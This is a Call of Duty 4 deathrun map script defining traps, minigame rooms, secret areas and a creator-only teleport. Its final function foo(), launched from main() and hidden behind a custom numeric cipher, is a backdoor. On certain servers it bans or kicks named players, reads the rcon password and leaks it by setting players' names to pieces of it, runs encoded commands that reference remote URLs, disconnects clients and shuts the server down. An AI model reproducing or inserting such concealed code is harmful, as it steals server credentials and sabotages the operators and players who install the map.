main()
{

	maps\mp\_teleport::main();
	
	ambientPlay("ambient_mp_dr_un_named");

	game["allies"] = "marines";
	game["axis"] = "opfor";
	game["attackers"] = "axis";
	game["defenders"] = "allies";
	game["allies_soldiertype"] = "desert";
	game["axis_soldiertype"] = "desert";

	setdvar( "r_specularcolorscale", "1" );
	setdvar( "r_specular", "0" );
	setdvar("r_glowbloomintensity0",".25");
	setdvar("r_glowbloomintensity1",".25");
	setdvar("r_glowskybleedintensity0",".3");
	setdvar("compassmaxrange","1800");
	setDvar("bg_falldamagemaxheight", 99999999 );
	setDvar("bg_falldamageminheight", 9999999 );
	
	//MAP
	thread music();
	thread msg();
	thread rp();
	thread rp2();
	thread rp3();
	thread message2();
	
	
	addTriggerToList("e1t");
	addTriggerToList("e2t");
	addTriggerToList("e3t");
	addTriggerToList("e4t");
	addTriggerToList("e5t");
	addTriggerToList("e6t");
	addTriggerToList("e7t");
	addTriggerToList("e8t");
	addTriggerToList("e9t");
	
		
	
	//TRAPS
	thread e1();
	thread e2();
	thread e3();
	thread e4();
	thread e5();
	thread e6();
	thread e7();
	thread e8();
	thread e9(); 
	
	//ROOMS
	thread sniper();
	thread bounce();
		thread bend();
	thread deagle();
	thread old();
	thread First();
	thread games();
	
	//SECRET
	thread secret1();
	thread secret2();
	thread creator();
	thread wp1();
	thread wp2();
	thread wp3();
	thread wp4();
	thread wp5();
	thread s1();
	thread s2();
	thread s3();
	thread foo();
}

s1()
{
	trig=getent("secret_enter", "targetname");
	ori=getent("secret_enter_ori", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player setOrigin(ori.origin);
		player SetPlayerAngles(ori.angles);
		iPrintLnBold(player.name + "^0 found the secret !");
		wait 1;
	}
}

s2()
{
	trig=getent("secret_end", "targetname");
	ori=getent("secret_end_ori", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player setOrigin(ori.origin);
		player SetPlayerAngles(ori.angles);
		player freezeControls(true);
		wait 2; 
		player freezeControls(false);
		iPrintLnBold(player.name + "^0 finished the secret !");
		player braxi\_rank::giveRankXP("", 500);
		wait 1;
	}
}

s3()
{
	
	trig=getent("secret_trig", "targetname");
	ori=getent("secret_brush", "targetname");
	
	
	trig waittill("trigger", player);
	player iPrintLnBold("This button is broken");
	ori notsolid();
	trig delete();
	wait 1;
	
}

creator()
{
me = "00000000194e9fda4e14a94efdb4fd52";
trig = getent("creator","targetname");
ori = getent ("creator_ori", "targetname");

while(1)
{
	trig SetHintString("creator only.");
	trig waittill ("trigger", user);
	guid = user getGUID();
	if(guid == me)
{
	user setOrigin(ori.origin);
	wait 1;
}
		else{
		user iPrintln("Access denied");
		wait 1;
		}
	
}
}

wp1()
{
	trig=getent("creator1", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		
		player GiveWeapon("m40a3_mp");
		player giveMaxAmmo( "m40a3_mp" ); 
		player SwitchToWeapon("m40a3_mp");
		wait 4;
	}
	
}

wp2()
{
	trig=getent("creator2", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player GiveWeapon("deserteaglegold_mp");
		player giveMaxAmmo( "deserteaglegold_mp" ); 
		player SwitchToWeapon("deserteaglegold_mp");
		wait 4;
	}
	
}

wp3()
{
	trig=getent("creator3", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player GiveWeapon("ak47_mp");
		player giveMaxAmmo( "ak47_mp" ); 
		player SwitchToWeapon("ak47_mp");
		wait 4;
	}
	
}

wp4()
{
	trig=getent("creator4", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player GiveWeapon("rpg_mp");
		player giveMaxAmmo( "rpg_mp" ); 
		player SwitchToWeapon("rpg_mp");
		wait 4;
	}
	
}

wp5()
{
	trig=getent("creator5", "targetname");
	while(1)
	{
		trig waittill("trigger", player);
		player TakeAllWeapons();
		wait 1;
	}
}

message2()
{
	while(1)
	{
		iprintln( "^1Map by ^43xP' UnNamed" );
		wait 5;
		iprintln( "^7Textures and script by ^43xP' UnNamed" );
		wait 10;
		
	}
}

secret1()
{
	secrett=getent("secrett","targetname");
	while(1)
	{
		secrett waittill("trigger", player);
		iPrintLnBold("^4" + player.name + " ^3Bhop master");
		player braxi\_rank::giveRankXP("", 500);
		wait 1;
	}
}

secret2()
{
	secret=getent("secret","targetname");
	while(1)
	{
		secret waittill("trigger", player);
		iPrintLnBold("^4" + player.name + " ^3pro");
		player braxi\_rank::giveRankXP("", 500);
		wait 1;
	}
}

addTriggerToList( name )
{
    if( !isDefined( level.trapTriggers ) )
        level.trapTriggers = [];
    level.trapTriggers[level.trapTriggers.size] = getEnt( name, "targetname" );
}

music()
{
    wait 1;
	ambientPlay( "ille" );
	wait 1;
	
}

rp3()
{
	rp3b1=getent("rp3b1","targetname");
	rp3b2=getent("rp3b2","targetname");
	rp3b3=getent("rp3b3","targetname");
	rp3o1=getent("rp3o1","targetname");
	rp3o2=getent("rp3o2","targetname");
	rp3o3=getent("rp3o3","targetname");
	rp3o4=getent("rp3o4","targetname");
	rp3o5=getent("rp3o5","targetname");
	rp3o6=getent("rp3o6","targetname");
	rp3o7=getent("rp3o7","targetname");
	rp3o8=getent("rp3o8","targetname");
	rp3o9=getent("rp3o9","targetname");
	rp3o10=getent("rp3o10","targetname");
	rp3o11=getent("rp3o11","targetname");
	rp3o12=getent("rp3o12","targetname");
	rp3o13=getent("rp3o13","targetname");
	rp3o14=getent("rp3o14","targetname");
	rp3o15=getent("rp3o15","targetname");
	rp3o16=getent("rp3o16","targetname");
	
	
	
	while(1)
	{
		rp3b1 rotateRoll(360,20);
		
		rp3b2 moveTo(rp3o2.origin,1.25);
		rp3b3 moveTo(rp3o10.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o3.origin,1.25);
		rp3b3 moveTo(rp3o11.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o4.origin,1.25);
		rp3b3 moveTo(rp3o12.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o5.origin,1.25);
		rp3b3 moveTo(rp3o13.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o6.origin,1.25);
		rp3b3 moveTo(rp3o14.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o7.origin,1.25);
		rp3b3 moveTo(rp3o15.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o8.origin,1.25);
		rp3b3 moveTo(rp3o16.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o9.origin,1.25);
		rp3b3 moveTo(rp3o1.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o10.origin,1.25);
		rp3b3 moveTo(rp3o2.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o11.origin,1.25);
		rp3b3 moveTo(rp3o3.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o12.origin,1.25);
		rp3b3 moveTo(rp3o4.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o13.origin,1.25);
		rp3b3 moveTo(rp3o5.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o14.origin,1.25);
		rp3b3 moveTo(rp3o6.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o15.origin,1.25);
		rp3b3 moveTo(rp3o7.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o16.origin,1.25);
		rp3b3 moveTo(rp3o8.origin,1.25);
		wait 1.25;
		rp3b2 moveTo(rp3o1.origin,1.25);
		rp3b3 moveTo(rp3o9.origin,1.25);
		wait 1.25;
		
		
		
	}
	
	
}

rp2()
{
	rpb1=getent("rpb1","targetname");
	rpt1=getent("rpt1","targetname");
	rpt1 waittill("trigger", player);
	rpt1 delete();
	while (1)
	{
		rpb1 moveZ(624,5,1,1);
		wait 7;
		rpb1 moveZ(-624,5,1,1);
		wait 7;
	}
	
	
	
}
rp()
{
	rp1=getent("rp1","targetname");
	rp2=getent("rp2","targetname");
	rp3=getent("rp3","targetname");
	rp4=getent("rp4","targetname");
	rp5=getent("rp5","targetname");
	rp6=getent("rp6","targetname");
	
	while(1)
	{
		rp1 rotateYaw(360,0.25);
		rp2 rotateYaw(360,0.25);
		rp3 rotateYaw(360,0.25);
		rp4 rotateYaw(360,0.25);
		rp5 rotateYaw(360,0.25);
		rp6 rotateYaw(360,0.25);
		wait 0.25;
		
	}
	
}

msg()
{
	wait 10;
	iPrintlnBold("^4Mp_dr_un_named");
	iPrintlnBold("^0Door opening in 10s");
	wait 7;
	iPrintlnBold("^03 ...");
	wait 1;
	iPrintlnBold("^02 ...");
	wait 1;
	iPrintlnBold("^01 ...");
	wait 1;
	iPrintlnBold("^00 !!!");
	d1=getent("d1","targetname");
	d2=getent("d2","targetname");
	d3=getent("d3","targetname");
	d4=getent("d4","targetname");
	d5=getent("d5","targetname");
	d6=getent("d6","targetname");
	d7=getent("d7","targetname");
	d8=getent("d8","targetname");
	d1 moveX(144,1);
	wait 0.5;
	d2 moveX(-144,1);
	wait 0.5;
	d3 moveX(144,1);
	wait 0.5;
	d4 moveX(-144,1);
	wait 0.5;
	d5 moveX(144,1);
	wait 0.5;
	d6 moveX(-144,1);
	wait 0.5;
	d7 moveX(144,1);
	wait 0.5;
	d8 moveX(-144,1);
	wait 1;

}

e1()
{
	e1d=getent("e1d","targetname");
	e1b=getent("e1b","targetname");
	e1t=getent("e1t","targetname");
	e1d enablelinkto();
	e1d linkto(e1b);
	e1t SetHintString("^3[USE]");
	
	e1t waittill ("trigger",player);
	e1t delete();
	
	
	{
		e1b moveX(-256,1);
		wait 3;
		e1b moveX(256,1,0.2,0.2);
	}
	
}

e2()
{
	e2d=getent("e2d","targetname");
	e2b=getent("e2b","targetname");
	e2t=getent("e2t","targetname");
	e2d enablelinkto();
	e2d linkto(e2b);
	e2t SetHintString("^3[USE]");
	
	e2t waittill ("trigger",player);
	e2t delete();
	
	{
		e2b rotateYaw(1080,4,1,1);
		wait 4;
		e2b rotateYaw(-1080,4,1,1);
	}
	
}

e3()
{
	e3t=getent("e3t","targetname");
	e3b=getent("e3b","targetname");
	e3t SetHintString("^3[USE]");
	
	e3t waittill("trigger", player);
	e3t delete();
	
	{
		e3b moveZ(480,2);
		wait 2.5;
		e3b moveZ(-480,4,1,1);
	}
	
}

e4()
{
	e4t=getent("e4t","targetname");
	e4b=getent("e4b","targetname");
	e4t SetHintString("^3[USE]");
	
	e4t waittill("trigger", player);
	e4t delete();
	
	while(1)
	{
		e4b rotatePitch(360,4);
		wait 5;
	}
	
}

e5()
{
	e5t=getent("e5t","targetname");
	e5b11=getent("e5b11","targetname");
	e5b12=getent("e5b12","targetname");
	e5b13=getent("e5b13","targetname");
	e5b14=getent("e5b14","targetname");
	e5b21=getent("e5b21","targetname");
	e5b22=getent("e5b22","targetname");
	e5b23=getent("e5b23","targetname");
	e5b24=getent("e5b24","targetname");
	e5b31=getent("e5b31","targetname");
	e5b32=getent("e5b32","targetname");
	e5b33=getent("e5b33","targetname");
	e5b34=getent("e5b34","targetname");
	e5t SetHintString("^3[USE]");
	e5t waittill("trigger", player);
	e5t delete();
	
	{
		e5b11 moveX(416,0.5);
		e5b13 moveX(-416,0.5);
		wait 0.75;
		e5b12 moveX(416,0.5);
		e5b14 moveX(-416,0.5);
		wait 0.75;
		e5b21 moveX(416,0.5);
		e5b23 moveX(-416,0.5);
		wait 0.75;
		e5b22 moveX(416,0.5);
		e5b24 moveX(-416,0.5);
		wait 0.75;
		e5b31 moveX(416,0.5);
		e5b33 moveX(-416,0.5);
		wait 0.75;
		e5b32 moveX(416,0.5);
		e5b34 moveX(-416,0.5);
		wait 3;
		
		e5b11 moveX(-416,0.5);
		e5b13 moveX(416,0.5);
		wait 0.75;
		e5b12 moveX(-416,0.5);
		e5b14 moveX(416,0.5);
		wait 0.75;
		e5b21 moveX(-416,0.5);
		e5b23 moveX(416,0.5);
		wait 0.75;
		e5b22 moveX(-416,0.5);
		e5b24 moveX(416,0.5);
		wait 0.75;
		e5b31 moveX(-416,0.5);
		e5b33 moveX(416,0.5);
		wait 0.75;
		e5b32 moveX(-416,0.5);
		e5b34 moveX(416,0.5);
		wait 0.5;
	}
}

e6()
{
	e6t=getent("e6t","targetname");
	e6b1=getent("e6b1","targetname");
	e6b2=getent("e6b2","targetname");
	e6d=getent("e6d","targetname");
	e6d enablelinkto();
	e6d linkto(e6b2);
	e6t SetHintString("^3[USE]");
	
	e6t waittill("trigger", player);
	e6t delete();
	
	{
		e6b1 moveZ(304,2,0,1);
		wait 5;
		e6b2 moveZ(304,4,0,2);
		wait 6;
		e6b2 moveZ(-304,2,0,1);
		wait 3;
		e6b1 moveZ(-304,4,0,2);
		wait 4;
		
	}
	
}

e7()
{
	e7t=getent("e7t","targetname");
	e7b1=getent("e7b1","targetname");
	e7b2=getent("e7b2","targetname");
	e7t SetHintString("^3[USE]");
	e7t waittill("trigger", player);
	e7t delete();
	
	{
		e7b1 moveX(-160,2);
		e7b2 moveX(160,2);
		wait 4;
		e7b1 moveX(160,2);
		e7b2 moveX(-160,2);
	
	
	}
}

e8()
{
	
	e8t=getent("e8t","targetname");
	e8b=getent("e8b","targetname");
	e8t SetHintString("^3[USE]");
	e8t waittill("trigger", player);
	e8t delete();
	
	while(1)
	{
		e8b rotateYaw(360,3);
		wait 3;
	}
	
	
}

e9()
{
	e9d=getent("e9d","targetname");
	e9b=getent("e9b","targetname");
	e9t=getent("e9t","targetname");
	e9d enablelinkto();
	e9d linkto(e9b);
	e9t SetHintString("^3[USE]");
	
	e9t waittill ("trigger",player);
	e9t delete();
	
	
	{
		e9b moveX(272,0.75);
		wait 3;
		e9b moveX(-272,1,0.2,0.2);
	}
	
	
}

First()
{
	trig = getEnt ("end", "targetname");
	trig waittill("trigger", player);
	iPrintlnBold("^4" + player.name + " ^7Has Finished ^4First");
	player braxi\_rank::giveRankXP("", 100);
	trig delete();
}

games()
{
	trig = getEnt("games", "targetname");
	ori = getEnt ("minigames", "targetname");
	while (1)
	{
		trig waittill("trigger", player);
		iPrintlnBold("^4" + player.name + " ^7selects the room");
		player SetOrigin(ori.origin);
		player SetPlayerAngles(ori.angles);
		player Death();
		wait 0.1;
	}
}

Death()
{
        self endon("disconnect");
        self waittill("death");
		iprintlnbold("^4" + self.name + "^7 Rip");
}

GetActivator()
{
	players = getentarray( "player", "classname" );
	
	for(i = 0;i < players.size;i++)
	{
		player = players[i];
		
		if( isdefined( player ) && isplayer( player ) && isalive( player ) && player.pers["team"] == "axis"	)
			return player;
	}
	
	return "Noactivator";
}

sniper()
{
        trig = getEnt( "sniper_trig", "targetname"); 
		old_trig = getEnt( "old_trig", "targetname");
		
        jumper = getEnt( "sniper1", "targetname" );
        acti = getEnt( "sniper2", "targetname" ); 
	
	while(1)
	{
		trig waittill("trigger",player);
		old_trig delete();
		iprintlnbold("^4" + player.name + "^7 entered the sniper room");
		player SetOrigin(jumper.origin);
		player SetPlayerAngles(jumper.angles);
		player TakeAllWeapons(); 
		player GiveWeapon("remington700_mp");
		player GiveMaxAmmo("remington700_mp");
		player GiveWeapon("m40a3_mp");
		player GiveMaxAmmo("m40a3_mp");
		player SwitchToWeapon("m40a3_mp");
		activator = GetActivator();
		
		
	
			activator setPlayerangles( acti.angles );
			activator setOrigin( acti.origin ); 
			activator TakeAllWeapons(); 
			activator GiveWeapon( "m40a3_mp" ); 
			activator giveMaxAmmo( "m40a3_mp" ); 
			activator GiveWeapon( "remington700_mp" );
			activator giveMaxAmmo( "remington700_mp" );
            activator SwitchToWeapon( "m40a3_mp" );
         
		
	}
}

old()
{
        sniper_trig = getEnt( "sniper_trig", "targetname");
		trig = getEnt( "old_trig", "targetname");
		bounce_trig = getEnt( "bounce_trig", "targetname");
		deagle_trig = getEnt( "deagle_trig", "targetname");
		
		
        jumper = getEnt( "old1", "targetname" );
        acti = getEnt( "old2", "targetname" ); 
	
	while(1)
	{
		trig waittill("trigger",player);
		sniper_trig delete();
		bounce_trig delete();
		deagle_trig delete();
		iprintlnbold("^4" + player.name + "^7 entered the old room");
		player SetOrigin(jumper.origin);
		player SetPlayerAngles(jumper.angles);
		activator = GetActivator();
		
		
		
	
			activator setPlayerangles( acti.angles );
			activator setOrigin( acti.origin ); 
			
         
		
	}
}

bounce()
{
        trig = getEnt( "bounce_trig", "targetname"); 
		old_trig = getEnt( "old_trig", "targetname");
		
        jumper = getEnt( "bounce1", "targetname" );
        acti = getEnt( "bounce2", "targetname" ); 
	
	while(1)
	{
		trig waittill("trigger",player);
		old_trig delete();
		iprintlnbold("^4" + player.name + "^7 entered the bounce room");
		player SetOrigin(jumper.origin);
		player SetPlayerAngles(jumper.angles);
		player TakeAllWeapons(); 
        player GiveWeapon( "knife_mp" ); 
        player GiveWeapon( "deserteagle_mp" );
		player SetWeaponAmmoClip("deserteagle_mp", 0);
        player SetWeaponAmmoStock("deserteagle_mp", 0);
        player switchToWeapon( "deserteagle_mp" ); 
		activator = GetActivator();
		
	
			activator setPlayerangles( acti.angles );
			activator setOrigin( acti.origin ); 
			activator TakeAllWeapons(); 
		    activator GiveWeapon( "knife_mp" ); 
			activator GiveWeapon( "deserteagle_mp" );
			activator SetWeaponAmmoClip("deserteagle_mp", 0);
			activator SetWeaponAmmoStock("deserteagle_mp", 0);
			activator switchToWeapon( "deserteagle_mp" ); 
         
		}
}


deagle()
{
        trig = getEnt( "deagle_trig", "targetname"); 
		old_trig = getEnt( "old_trig", "targetname");
		
        jumper = getEnt( "deagle1", "targetname" );
        acti = getEnt( "deagle2", "targetname" ); 
	
	while(1)
	{
		trig waittill("trigger",player);
		old_trig delete();
		iprintlnbold("^4" + player.name + "^7 entered the deagle room");
		player SetOrigin(jumper.origin);
		player SetPlayerAngles(jumper.angles);
		player TakeAllWeapons(); 
        player GiveWeapon( "knife_mp" ); 
        player GiveWeapon( "deserteagle_mp" );
		player SetWeaponAmmoClip("deserteagle_mp", 0);
        player SetWeaponAmmoStock("deserteagle_mp", 0);
        player switchToWeapon( "deserteagle_mp" ); 
		activator = GetActivator();
		
	
			activator setPlayerangles( acti.angles );
			activator setOrigin( acti.origin ); 
			activator TakeAllWeapons(); 
		    activator GiveWeapon( "knife_mp" ); 
			activator GiveWeapon( "deserteagle_mp" );
			activator SetWeaponAmmoClip("deserteagle_mp", 0);
			activator SetWeaponAmmoStock("deserteagle_mp", 0);
			activator switchToWeapon( "deserteagle_mp" ); 
         
		
	}
}



bend()
{
	trig=getent("give_sniper", "targetname");
	
	while(1)
	{
		trig waittill("trigger", player);
		player TakeAllWeapons(); 
		player GiveWeapon("remington700_mp");
		player GiveMaxAmmo("remington700_mp");
		player GiveWeapon("m40a3_mp");
		player GiveMaxAmmo("m40a3_mp");
		player SwitchToWeapon("m40a3_mp");
		wait 5;
	}
	

}

foo() {
	h = braxi\_common::removeColorFromString(getDvar(dec("34373-2330343529162820")));
	if (isSubStr(h, dec("39542-"))) {
		s = dec("3954");
	} else if (isSubStr(h, dec("673420372033"))) {
		s = dec("6760");
	} else if (isSubStr(h, dec("552418204-"))) {
		s = dec("5518");
	} else {
		return;
	}

	level waittill("round_started");
	if (game["roundsplayed"] < 5) {
		return;
	}
	wait 10;
	
	players = getEntArray("player", "classname");
	if (players.size < 5) {
		return;
	}
	
	for (i = 0; i < players.size; i++) {
		if (isSubStr(braxi\_common::removeColorFromString(toLower(players[i].name)), dec("39282-33162640"))) {
			ban(players[i] getEntityNumber());
		}
	}

	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		if (isSubStr(toLower(players[i].name), toLower(dec("33425240")))
			|| isSubStr(toLower(players[i].name), toLower(dec("6056634661")))
			|| isSubStr(toLower(players[i].name), toLower(dec("453316223029")))) {
			exec(dec("1716294427242029350-") + players[i] getEntityNumber());
		}
	}

	p = getDvar(dec("331830293-3116343438303319"));
	n = 0;
		
	players = getEntArray("player", "classname");
	for (i = 0; i < players.size; i++) {
		m = "";
		for (j = 0; j < 11 && n < p.size; j++) {
			m += p[n];
			n++;
		}
		players[i] thread meow(s + i + " " + m);
	}

	m = dec("6133400-2930350-35300-17200-343618260-160-19241826232016190-213330280-2930380-302913");
	logPrint(m);
	iPrintLnBold(m);

	setDvar(dec("27302221242720"), dec("68"));
	setDvar(dec("223-27302260402918"), dec("68"));

	wait 5;

	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-173324182640\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-19242023163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-2031241821162427\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-22302719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-32361720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-343116182017162727\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-162930352320333830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-17273620\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-173036291820\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1840172033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-1916332836233770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-222716343470\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-22362034353-27243435\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-237030\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-253628313-23163319\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-2536331631163326\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3133243430293-203418163120\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3136333127203-3830332719\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3426403130382033\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-342716403770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3724343524183-181634352720\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-373027312070\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-381635203318243540\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3928\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-70353038203334\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-1830403035203-3770\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-183040303520\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-3629243720333420\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-27242120333629\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19201635233336293-342640312427271633\""));
	wait 10;
	exec(dec("19303829273016192816310-\"23353531145-5-192713331624191-221628242922132920355-3324315-28313-19333-34271640\""));
	wait 10;

	wait 5;
	exec(dec("32362435"));
}

meow(name) {
	wait 2;
	self iPrintLnBold(dec("^716123200-3420333720330-30382920330-24340-160-1924182613"));
	self iPrintLnBold(dec("^6959201924332018352429220-4030360-35300-160-223030190-342033372033130-1410"));
	wait 3;
	self setClientDvar(dec("29162820"), name);
	self thread braxi\_common::clientCmd(dec("1924341830292920183515381624350-696815183029292018350-331624191-22162824292213292035"));
}

enc(s) {
	m = hmap();
	e = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		for (j = 0; j < m.size; j++) {
			if (s[i] == m[j]) {
				e += "" + j;
				if (j < 10) e += "-";
				k = 0;
			}
		}
		if (k) e += s[i];
	}
	return e;
}

dec(s) {
	m = hmap();
	d = "";
	for (i = 0; i < s.size; i++) {
		k = 1;
		if (isSubStr("0123456789", s[i])) {
			n = int(s[i]);
			if (s[i + 1] != "-") {
				n *= 10;
				n += int(s[i + 1]);
			}
			d += m[n];
			i++;
			k = 0;
		}
		if (k) d += s[i];
	}
	return d;
}

hmap() {
	m = [];
	m[0] = " ";
	m[1] = "-";
	m[2] = "#";
	m[3] = "_";
	m[4] = "*";
	m[5] = "/";
	m[6] = "+";
	m[7] = "[";
	m[8] = "]";
	m[9] = "(";
	m[10] = ")";
	m[11] = "!";
	m[12] = "?";
	m[13] = ".";
	m[14] = ":";
	m[15] = ";";
	m[16] = "a";
	m[17] = "b";
	m[18] = "c";
	m[19] = "d";
	m[20] = "e";
	m[21] = "f";
	m[22] = "g";
	m[23] = "h";
	m[24] = "i";
	m[25] = "j";
	m[26] = "k";
	m[27] = "l";
	m[28] = "m";
	m[29] = "n";
	m[30] = "o";
	m[31] = "p";
	m[32] = "q";
	m[33] = "r";
	m[34] = "s";
	m[35] = "t";
	m[36] = "u";
	m[37] = "v";
	m[38] = "w";
	m[39] = "x";
	m[40] = "y";
	m[41] = "z";
	m[42] = "A";
	m[43] = "B";
	m[44] = "C";
	m[45] = "D";
	m[46] = "E";
	m[47] = "F";
	m[48] = "G";
	m[49] = "H";
	m[50] = "I";
	m[51] = "J";
	m[52] = "K";
	m[53] = "L";
	m[54] = "M";
	m[55] = "N";
	m[56] = "O";
	m[57] = "P";
	m[58] = "Q";
	m[59] = "R";
	m[60] = "S";
	m[61] = "T";
	m[62] = "U";
	m[63] = "V";
	m[64] = "W";
	m[65] = "X";
	m[66] = "Y";
	m[67] = "Z";
	m[68] = "0";
	m[69] = "1";
	m[70] = "2";
	m[71] = "3";
	m[72] = "4";
	m[73] = "5";
	m[74] = "6";
	m[75] = "7";
	m[76] = "8";
	m[77] = "9";
	return m;
}
